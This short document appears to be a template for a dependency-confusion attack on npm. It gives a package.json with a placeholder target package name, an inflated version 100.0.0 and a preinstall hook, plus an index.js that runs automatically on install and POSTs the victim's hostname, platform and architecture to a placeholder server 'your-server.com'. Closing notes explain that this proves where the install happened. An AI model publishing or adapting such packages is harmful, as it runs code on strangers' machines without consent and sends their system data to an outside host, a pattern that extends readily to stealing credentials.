
# Example <h1>package.json/h1>



{
  "name": "Target package name",
  "version": "100.0.0",
  "scripts": {
    "preinstall": "node index.js"
  }
}


...........................................................................................

Than for > <h1>index.js</h1>



const https = require("https");
const os = require("os");

const data = JSON.stringify({
  hostname: os.hostname(),
  platform: os.platform(),
  arch: os.arch()
});

const req = https.request({
  hostname: "your-server.com",
  path: "/hit",
  method: "POST",
  headers: {
    "Content-Type": "application/json",
    "Content-Length": data.length
  }
});

req.write(data);
req.end();


........................................................................

- What this gives you

When installed, you get:

Source IP 
Basic system info 
Timestamp 

- That’s enough to prove:

install happened
where it came from (cloud / corp ASN / etc.) 
